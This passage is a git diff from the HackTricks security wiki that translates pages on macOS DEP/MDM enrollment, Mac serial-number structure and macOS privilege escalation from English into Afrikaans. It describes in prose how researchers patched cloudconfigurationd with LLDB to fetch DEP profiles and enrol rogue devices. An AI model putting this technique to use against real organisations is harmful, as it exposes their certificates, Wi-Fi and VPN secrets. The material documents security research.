(bv. **Serienommer via `IOKit`**) +3. Kry **sessiesleutel** +1. POST [https://iprofiles.apple.com/session](https://iprofiles.apple.com/session) +4. Stel die sessie op (**`NACKeyEstablishment`**) +5. Doen die versoek +1. POST na [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) en stuur die data `{ "action": "RequestProfileConfiguration", "sn": "" }` +2. Die JSON-lading word versleutel met Absinthe (**`NACSign`**) +3. Alle versoek word oor HTTPs gestuur, ingeboude rootsertifikate word gebruik ![](<../../../.gitbook/assets/image (566).png>) -The response is a JSON dictionary with some important data like: +Die respons is 'n JSON-woordeboek met belangrike data soos: -* **url**: URL of the MDM vendor host for the activation profile -* **anchor-certs**: Array of DER certificates used as trusted anchors +* **url**: URL van die MDM-leweransier-gashuis vir die aktiveringsprofiel +* **anchor-certs**: Array van DER-sertifikate wat as vertroude ankers gebruik word -### **Step 5: Profile Retrieval** +### **Stap 5: Profiel ophaling** ![](<../../../.gitbook/assets/image (567).png>) -* Request sent to **url provided in DEP profile**. -* **Anchor certificates** are used to **evaluate trust** if provided. - * Reminder: the **anchor\_certs** property of the DEP profile -* **Request is a simple .plist** with device identification - * Examples: **UDID, OS version**. -* CMS-signed, DER-encoded -* Signed using the **device identity certificate (from APNS)** -* **Certificate chain** includes expired **Apple iPhone Device CA** +* Versoek gestuur na **url wat in DEP-profiel verskaf is**. +* **Ankersertifikate** word gebruik om vertroue te **evalueer** indien verskaf. +* Onthou: die **anchor\_certs** eienskap van die DEP-profiel +* **Versoek is 'n eenvoudige .plist** met toestelidentifikasie +* Voorbeelde: **UDID, OS-weergawe**. +* CMS-onderteken, DER-gekodeer +* Onderteken met die **toestelidentiteitsertifikaat (van APNS)** +* **Sertifikaatketting** sluit verstreke **Apple iPhone Device CA** in -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png>) -### Step 6: Profile Installation +### Stap 6: Profielinstallasie -* Once retrieved, **profile is stored on the system** -* This step begins automatically (if in **setup assistant**) -* Driven by **`CPInstallActivationProfile`** -* Implemented by mdmclient over XPC - * LaunchDaemon (as root) or LaunchAgent (as user), depending on context -* Configuration profiles have multiple payloads to install -* Framework has a plugin-based architecture for installing profiles -* Each payload type is associated with a plugin - * Can be XPC (in framework) or classic Cocoa (in ManagedClient.app) -* Example: - * Certificate Payloads use CertificateService.xpc +* Sodra dit opgehaal is, word die **profiel op die stelsel gestoor** +* Hierdie stap begin outomaties (as in die **opstellingsassistent**) +* Gedryf deur **`CPInstallActivationProfile`** +* Geïmplementeer deur mdmclient oor XPC +* LaunchDaemon (as root) of LaunchAgent (as gebruiker), afhangende van die konteks +* Konfigurasieprofiel het verskeie ladinge om te installeer +* Die raamwerk het 'n plugin-gebaseerde argitektuur vir die installeer van profiele +* Elke ladingstipe is geassosieer met 'n plugin +* Dit kan XPC (in die raamwerk) of klassieke Cocoa (in ManagedClient.app) wees +* Voorbeeld: +* Sertifikaatladinge gebruik CertificateService.xpc -Typically, **activation profile** provided by an MDM vendor will **include the following payloads**: +Gewoonlik sal die **aktiveringsprofiel** wat deur 'n MDM-leweransier verskaf word, die volgende ladinge insluit: -* `com.apple.mdm`: to **enroll** the device in MDM -* `com.apple.security.scep`: to securely provide a **client certificate** to the device. -* `com.apple.security.pem`: to **install trusted CA certificates** to the device’s System Keychain. -* Installing the MDM payload equivalent to **MDM check-in in the documentation** -* Payload **contains key properties**: +* `com.apple.mdm`: om die toestel in MDM te **registreer** +* `com.apple.security.scep`: om 'n **kliëntsertifikaat** veilig aan die toestel te voorsien. +* `com.apple.security.pem`: om vertroude CA-sertifikate in die toestel se Stelsel Sleutelketting te **installeer**. +* Installeer die MDM-lading wat gelykstaande is aan **MDM-kontrole in die dokumentasie** +* Lading bevat **sleutel eienskappe**: * - * MDM Check-In URL (**`CheckInURL`**) - * MDM Command Polling URL (**`ServerURL`**) + APNs topic to trigger it -* To install MDM payload, request is sent to **`CheckInURL`** -* Implemented in **`mdmclient`** -* MDM payload can depend on other payloads -* Allows **requests to be pinned to specific certificates**: - * Property: **`CheckInURLPinningCertificateUUIDs`** - * Property: **`ServerURLPinningCertificateUUIDs`** - * Delivered via PEM payload -* Allows device to be attributed with an identity certificate: - * Property: IdentityCertificateUUID - * Delivered via SCEP payload +* MDM Kontrole URL (**`CheckInURL`**) +* MDM Opdragopvraag URL (**`ServerURL`**) + APNs-onderwerp om dit te aktiveer +* Om MDM-lading te installeer, word 'n versoek gestuur na **`CheckInURL`** +* Geïmplementeer in **`mdmclient`** +* MDM-lading kan afhang van ander ladinge +* Maak dit moontlik om **versoeke aan spesifieke sertifikate te koppel**: +* Eienskap: **`CheckInURLPinningCertificateUUIDs`** +* Eienskap: **`ServerURLPinningCertificateUUIDs`** +* Afgelewer via PEM-lading +* Maak dit moontlik om die toestel aan 'n identiteitsertifikaat te koppel: +* Eienskap: IdentityCertificateUUID +* Afgelewer via SCEP-lading -### **Step 7: Listening for MDM commands** +### **Stap 7: Luister vir MDM-opdragte** -* After MDM check-in is complete, vendor can **issue push notifications using APNs** -* Upon receipt, handled by **`mdmclient`** -* To poll for MDM commands, request is sent to ServerURL -* Makes use of previously installed MDM payload: - * **`ServerURLPinningCertificateUUIDs`** for pinning request - * **`IdentityCertificateUUID`** for TLS client certificate - -## Attacks - -### Enrolling Devices in Other Organisations - -As previously commented, in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ -Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected: - -{% content-ref url="enrolling-devices-in-other-organisations.md" %} -[enrolling-devices-in-other-organisations.md](enrolling-devices-in-other-organisations.md) -{% endcontent-ref %} - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+* Nadat MDM-kontrole voltooi is, kan die leweransier **push-meldings uitreik deur APNs te gebruik** +* Wanneer ontvang, hanteer deur **`mdmclient`** +* Om vir MDM-opdragte te vra, word 'n versoek gestuur na ServerURL +* Maak gebruik van voorheen geïnstalleerde MDM-lading: +* **`ServerURLPinningCertificateUUIDs`** vir koppeling van versoek +* **`IdentityCertificateUUID`** vir TLS-kliëntsertifikaat diff --git a/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md b/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md index 7ce217390..bbde2c76a 100644 --- a/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md +++ b/macos-hardening/macos-red-teaming/macos-mdm/enrolling-devices-in-other-organisations.md @@ -1,82 +1,82 @@ -# Enrolling Devices in Other Organisations +# Inskrywing van Toestelle in Ander Organisasies
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Intro +## Inleiding -As [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ -Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected. +Soos [**voorheen genoem**](./#what-is-mdm-mobile-device-management)**,** is dit nodig om 'n toestel in 'n organisasie in te skryf **slegs 'n Serienommer wat aan daardie Organisasie behoort**. Sodra die toestel ingeskryf is, sal verskeie organisasies sensitiewe data op die nuwe toestel installeer: sertifikate, programme, WiFi-wagwoorde, VPN-konfigurasies [en so aan](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\ +Dit kan dus 'n gevaarlike toegangspunt vir aanvallers wees as die inskrywingsproses nie korrek beskerm word nie. -**The following is a summary of the research [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe). Check it for further technical details!** +**Die volgende is 'n opsomming van die navorsing [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe). Kyk daarvoor vir verdere tegniese besonderhede!** -## Overview of DEP and MDM Binary Analysis +## Oorsig van DEP en MDM Binêre Analise -This research delves into the binaries associated with the Device Enrollment Program (DEP) and Mobile Device Management (MDM) on macOS. Key components include: +Hierdie navorsing ondersoek die binêre lêers wat verband hou met die Device Enrollment Program (DEP) en Mobile Device Management (MDM) op macOS. Sleutelkomponente sluit in: -- **`mdmclient`**: Communicates with MDM servers and triggers DEP check-ins on macOS versions before 10.13.4. -- **`profiles`**: Manages Configuration Profiles, and triggers DEP check-ins on macOS versions 10.13.4 and later. -- **`cloudconfigurationd`**: Manages DEP API communications and retrieves Device Enrollment profiles. +- **`mdmclient`**: Kommunikeer met MDM-bedieners en veroorsaak DEP-inchecks op macOS-weergawes voor 10.13.4. +- **`profiles`**: Bestuur Konfigurasieprofiel en veroorsaak DEP-inchecks op macOS-weergawes 10.13.4 en later. +- **`cloudconfigurationd`**: Bestuur DEP API-kommunikasie en haal Toestelinskrywingsprofiel op. -DEP check-ins utilize the `CPFetchActivationRecord` and `CPGetActivationRecord` functions from the private Configuration Profiles framework to fetch the Activation Record, with `CPFetchActivationRecord` coordinating with `cloudconfigurationd` through XPC. +DEP-inchecks maak gebruik van die `CPFetchActivationRecord` en `CPGetActivationRecord` funksies van die private Konfigurasieprofiel-raamwerk om die Aktiveringsrekord op te haal, waar `CPFetchActivationRecord` deur middel van XPC met `cloudconfigurationd` saamwerk. -## Tesla Protocol and Absinthe Scheme Reverse Engineering +## Tesla-Protokol en Absint-Skema-Ontleding -The DEP check-in involves `cloudconfigurationd` sending an encrypted, signed JSON payload to _iprofiles.apple.com/macProfile_. The payload includes the device's serial number and the action "RequestProfileConfiguration". The encryption scheme used is referred to internally as "Absinthe". Unraveling this scheme is complex and involves numerous steps, which led to exploring alternative methods for inserting arbitrary serial numbers in the Activation Record request. +Die DEP-incheck behels dat `cloudconfigurationd` 'n versleutelde, ondertekende JSON-payload na _iprofiles.apple.com/macProfile_ stuur. Die payload sluit die toestel se serienommer en die aksie "RequestProfileConfiguration" in. Die gebruikte versleutelingsskema word intern as "Absint" verwys. Die ontrafeling van hierdie skema is kompleks en behels verskeie stappe, wat gelei het tot die ondersoek van alternatiewe metodes om arbitrêre serienommers in die Aktiveringsrekordversoek in te voeg. -## Proxying DEP Requests +## DEP Versoeke Proksie -Attempts to intercept and modify DEP requests to _iprofiles.apple.com_ using tools like Charles Proxy were hindered by payload encryption and SSL/TLS security measures. However, enabling the `MCCloudConfigAcceptAnyHTTPSCertificate` configuration allows bypassing the server certificate validation, although the payload's encrypted nature still prevents modification of the serial number without the decryption key. +Pogings om DEP-versoeke na _iprofiles.apple.com_ te onderskep en te wysig met behulp van hulpmiddels soos Charles Proxy is belemmer deur payload-versleuteling en SSL/TLS-sekuriteitsmaatreëls. Die aktivering van die `MCCloudConfigAcceptAnyHTTPSCertificate`-konfigurasie maak egter omseiling van die sertifikaatvalidering van die bediener moontlik, alhoewel die versleutelde aard van die payload steeds die wysiging van die serienommer sonder die dekripsiesleutel verhoed. -## Instrumenting System Binaries Interacting with DEP +## Instrumentering van Stelselbinêre Lêers wat met DEP Interageer -Instrumenting system binaries like `cloudconfigurationd` requires disabling System Integrity Protection (SIP) on macOS. With SIP disabled, tools like LLDB can be used to attach to system processes and potentially modify the serial number used in DEP API interactions. This method is preferable as it avoids the complexities of entitlements and code signing. +Die instrumentering van stelselbinêre lêers soos `cloudconfigurationd` vereis die deaktivering van Stelselintegriteitsbeskerming (SIP) op macOS. Met SIP gedeaktiveer, kan hulpmiddels soos LLDB gebruik word om aan stelselprosesse te heg en moontlik die serienommer wat in DEP API-interaksies gebruik word, te wysig. Hierdie metode is verkieslik omdat dit die kompleksiteite van toekennings en kodesondertekening vermy. -**Exploiting Binary Instrumentation:** -Modifying the DEP request payload before JSON serialization in `cloudconfigurationd` proved effective. The process involved: +**Uitbuiting van Binêre Instrumentering:** +Die wysiging van die DEP-versoek-payload voor JSON-serialisering in `cloudconfigurationd` was doeltreffend. Die proses het die volgende ingesluit: -1. Attaching LLDB to `cloudconfigurationd`. -2. Locating the point where the system serial number is fetched. -3. Injecting an arbitrary serial number into the memory before the payload is encrypted and sent. +1. Koppel LLDB aan `cloudconfigurationd`. +2. Vind die punt waar die stelselserienommer opgehaal word. +3. Voeg 'n arbitrêre serienommer in die geheue in voordat die payload versleutel en gestuur word. -This method allowed for retrieving complete DEP profiles for arbitrary serial numbers, demonstrating a potential vulnerability. +Hierdie metode het dit moontlik gemaak om volledige DEP-profiels vir arbitrêre serienommers op te haal, wat 'n potensiële kwesbaarheid aandui. -### Automating Instrumentation with Python +### Outomatisering van Instrumentering met Python -The exploitation process was automated using Python with the LLDB API, making it feasible to programmatically inject arbitrary serial numbers and retrieve corresponding DEP profiles. +Die uitbuitingsproses is geoutomatiseer met behulp van Python en die LLDB API, wat dit moontlik maak om arbitrêre serienommers outomaties in te voeg en ooreenstemmende DEP-profiels op te haal. -### Potential Impacts of DEP and MDM Vulnerabilities +### Potensiële Impakte van DEP en MDM-kwesbaarhede -The research highlighted significant security concerns: +Die navorsing het beduidende sekuriteitskwessies beklemtoon: -1. **Information Disclosure**: By providing a DEP-registered serial number, sensitive organizational information contained in the DEP profile can be retrieved. -2. **Rogue DEP Enrollment**: Without proper authentication, an attacker with a DEP-registered serial number can enroll a rogue device into an organization's MDM server, potentially gaining access to sensitive data and network resources. +1. **Inligtingsoopmaking**: Deur 'n DEP-geregistreerde serienommer te voorsien, kan sensitiewe organisatoriese inligting wat in die DEP-profiel bevat word, opgehaal word. +2. **Rogue DEP-inskrywing**: Sonder behoorlike outentisering kan 'n aanvaller met 'n DEP-geregistreerde serienommer 'n skelmtoestel in 'n organisasie se MDM-bediener inskryf, wat moontlik toegang tot sensitiewe data en netwerkbronne kan gee. -In conclusion, while DEP and MDM provide powerful tools for managing Apple devices in enterprise environments, they also present potential attack vectors that need to be secured and monitored. +Ten slotte, alhoewel DEP en MDM kragtige hulpmiddels bied vir die bestuur van Apple-toestelle in ondernemingsomgewings, bied hulle ook potensiële aanvalsvektore wat beveilig en gemonitor moet word.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md b/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md index 5959110b4..847bfa4e3 100644 --- a/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md +++ b/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md @@ -1,71 +1,71 @@ -# macOS Serial Number +# macOS Seriële Nommer
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Basic Information +## Basiese Inligting -Apple devices post-2010 have serial numbers consisting of **12 alphanumeric characters**, each segment conveying specific information: +Apple-toestelle na 2010 het serienommers wat bestaan uit **12 alfanumeriese karakters**, waarvan elke segment spesifieke inligting oordra: -- **First 3 Characters**: Indicate the **manufacturing location**. -- **Characters 4 & 5**: Denote the **year and week of manufacture**. -- **Characters 6 to 8**: Serve as a **unique identifier** for each device. -- **Last 4 Characters**: Specify the **model number**. +- **Eerste 3 Karakters**: Dui die **vervaardigingsplek** aan. +- **Karakters 4 & 5**: Dui die **jaar en week van vervaardiging** aan. +- **Karakters 6 tot 8**: Diens as 'n **unieke identifiseerder** vir elke toestel. +- **Laaste 4 Karakters**: Spesifiseer die **modelnommer**. -For instance, the serial number **C02L13ECF8J2** follows this structure. +Byvoorbeeld, die serienommer **C02L13ECF8J2** volg hierdie struktuur. -### **Manufacturing Locations (First 3 Characters)** -Certain codes represent specific factories: -- **FC, F, XA/XB/QP/G8**: Various locations in the USA. -- **RN**: Mexico. -- **CK**: Cork, Ireland. -- **VM**: Foxconn, Czech Republic. -- **SG/E**: Singapore. -- **MB**: Malaysia. +### **Vervaardigingsplekke (Eerste 3 Karakters)** +Sekere kodes verteenwoordig spesifieke fabrieke: +- **FC, F, XA/XB/QP/G8**: Verskeie plekke in die VSA. +- **RN**: Meksiko. +- **CK**: Cork, Ierland. +- **VM**: Foxconn, Tsjeggiese Republiek. +- **SG/E**: Singapoer. +- **MB**: Maleisië. - **PT/CY**: Korea. - **EE/QT/UV**: Taiwan. -- **FK/F1/F2, W8, DL/DM, DN, YM/7J, 1C/4H/WQ/F7**: Different locations in China. -- **C0, C3, C7**: Specific cities in China. -- **RM**: Refurbished devices. +- **FK/F1/F2, W8, DL/DM, DN, YM/7J, 1C/4H/WQ/F7**: Verskillende plekke in China. +- **C0, C3, C7**: Spesifieke stede in China. +- **RM**: Opgelapte toestelle. -### **Year of Manufacturing (4th Character)** -This character varies from 'C' (representing the first half of 2010) to 'Z' (second half of 2019), with different letters indicating different half-year periods. +### **Vervaardigingsjaar (4de Karakter)** +Hierdie karakter wissel van 'C' (wat die eerste helfte van 2010 verteenwoordig) tot 'Z' (tweede helfte van 2019), met verskillende letters wat verskillende halfjaarperiodes aandui. -### **Week of Manufacturing (5th Character)** -Digits 1-9 correspond to weeks 1-9. Letters C-Y (excluding vowels and 'S') represent weeks 10-27. For the second half of the year, 26 is added to this number. +### **Vervaardigingsweek (5de Karakter)** +Syfers 1-9 stem ooreen met weke 1-9. Die letters C-Y (uitgesluit klinkers en 'S') verteenwoordig weke 10-27. Vir die tweede helfte van die jaar word 26 by hierdie nommer gevoeg. -### **Unique Identifier (Characters 6 to 8)** -These three digits ensure each device, even of the same model and batch, has a distinct serial number. +### **Unieke Identifiseerder (Karakters 6 tot 8)** +Hierdie drie syfers verseker dat elke toestel, selfs van dieselfde model en lot, 'n unieke serienommer het. -### **Model Number (Last 4 Characters)** -These digits identify the specific model of the device. +### **Modelnommer (Laaste 4 Karakters)** +Hierdie syfers identifiseer die spesifieke model van die toestel. -### Reference +### Verwysing * [https://beetstech.com/blog/decode-meaning-behind-apple-serial-number](https://beetstech.com/blog/decode-meaning-behind-apple-serial-number)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md index 0fcf8364a..dc0ec533c 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -1,45 +1,45 @@ -# macOS Security & Privilege Escalation +# macOS Sekuriteit & Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! **Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hacking ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige wêreld van hacking deur middel van nuus en insigte in werklikheid -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutjagbounties wat begin en belangrike platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic MacOS +## Basiese MacOS -If you are not familiar with macOS, you should start learning the basics of macOS: +As jy nie bekend is met macOS nie, moet jy begin om die basiese beginsels van macOS te leer: -* Special macOS **files & permissions:** +* Spesiale macOS **lêers & 